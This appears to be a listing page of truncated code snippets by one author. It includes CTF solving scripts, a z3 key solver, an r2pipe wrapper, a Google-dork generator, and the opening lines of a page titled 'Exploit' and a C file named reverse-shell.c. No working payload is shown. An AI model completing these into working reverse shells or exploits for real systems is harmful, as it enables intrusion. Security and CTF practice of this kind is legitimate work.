SakiiR

// bandcamp-dl -f -r -u -d --base-dir . `cat ~/Downloads/bandcamp-wishlist.json|jq -r '.[]'|tr '\n' ' '`
const sleep = (ms) => new Promise((resolve) => setTimeout(resolve, ms));
async function download(jsonContent) {
    var element = document.createElement('a');

    element.setAttribute('href', 'data:application/json;charset=utf-8,' + encodeURIComponent(jsonContent));
    element.setAttribute('download', "bandcamp-wishlist.json");

    element.style.display = 'none';
    document.body.appendChild(element);

SakiiR

const puppeteer = require('puppeteer');
const Jimp = require("jimp");

const DEBUG = false;
const URL = "https://plaidctf.com/files/css.74486b61b22e49b3d8c5afebee1269e37b50071afbf1608b8b4563bf8d09ef92.html"

const minimal_args = [
    '--autoplay-policy=user-gesture-required',
    '--disable-background-networking',
    '--disable-background-timer-throttling',

SakiiR

#include <stdio.h>

int main()
{
 printf("%u\n", (((((((0 +0 +0 +0)<((sizeof "0b1_1011")-1)?"0b1_1011"[((sizeof "0b1_1011")-1)-1-(0 +0 +0 +0)]:0)=='1')<<((((((0 +0 +0 +0)<0 +0 +0 +0?((((((0 +0 +0 +0))<((sizeof "0b1_1011")-1)?"0b1_1011"[((sizeof "0b1_1011")-1)-1-((0 +0 +0 +0))]:0))|1)=='1'):0)+((0 +0 +0 +1)<0 +0 +0 +0?((((((0 +0 +0 +1))<((sizeof "0b1_1011")-1)?"0b1_1011"[((sizeof "0b1_1011")-1)-1-((0 +0 +0 +1))]:0))|1)=='1'):0)+((0 +0 +0 +2)<0 +0 +0 +0?((((((0 +0 +0 +2))<((sizeof "0b1_1011")-1)?"0b1_1011"[((sizeof "0b1_1011")-1)-1-((0 +0 +0 +2))]:0))|1)=='1'):0)+((0 +0 +0 +3)<0 +0 +0 +0?((((((0 +0 +0 +3))<((sizeof "0b1_1011")-1)?"0b1_1011"[((sizeof "0b1_1011")-1)-1-((0 +0 +0 +3))]:0))|1)=='1'):0))+(((0 +0 +4 +0)<0 +0 +0 +0?((((((0 +0 +4 +0))<((sizeof "0b1_1011")-1)?"0b1_1011"[((sizeof "0b1_1011")-1)-1-((0 +0 +4 +0))]:0))|1)=='1'):0)+((0 +0 +4 +1)<0 +0 +0 +0?((((((0 +0 +4 +1))<((sizeof "0b1_1011")-1)?"0b1_1011"[((sizeof "0b1_1011")-1)-1-((0 +0 +4 +1))]:0))|1)=='1'):0)+((0 +0 +4 +2)<0 +0 +0 +0?((((((0 +0 +4 +2))

SakiiR

@echo off
echo Virtualization must be disabled to use anti-cheat clients like FACEIT and ESEA
echo.

net session >nul 2>&1
if %ERRORLEVEL% EQU 0 goto :chchchchoices
echo This script requires elevated privileges. Re-run as Administrator to continue
goto :exit

:chchchchoices

SakiiR

<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Exploit</title>
  </head>
  <body>
    <script>

SakiiR

// gcc /tmp/reverse-shell.c -o /tmp/test

#include <arpa/inet.h>
#include <netinet/in.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <unistd.h>
#include <netdb.h>

SakiiR

Time Trials

• New High Score / World Record notification
• Leaderboard
• Ghost feature
  • Can be downloaded and set from player profiles
  • In game menu to handle this
• Give permanent/persistent medals on profiles/leaderboard ( like cs:go medals or rocket league titles )
• Add run demos on player profiles etc

SakiiR

/*
 * You can test this script by opening your favorite console browser
 * Then launch just 3 dorks with: dorksMe(`example.com`).slice(5,8).map( el => window.open(el))
 * Or all the dorks with: dorksMe(`example.com`).map( el => window.open(el))
 * Enjoy :)
 * @_SaxX_
 */

function dorksMe(site) {
  return [

SakiiR

#!/usr/bin/env python
# @SakiiR

import z3

def format_chunks(m, chunks):
    return "-".join([f"{int(str(m[c])):04d}" for c in chunks])

def doit_twice(s, chunks):
    try:

SakiiR

class R2:
    def __init__(self, file_path, args=[], debug=False):
        self._r = r2pipe.open(file_path, args)
        self._debug = debug

    def cmd(self, cmd, debug=True):
        if self._debug and debug:
            print(f"Executing command: '{cmd}'")
        res = self._r.cmd(cmd).rstrip("\n")
        if self._debug and debug: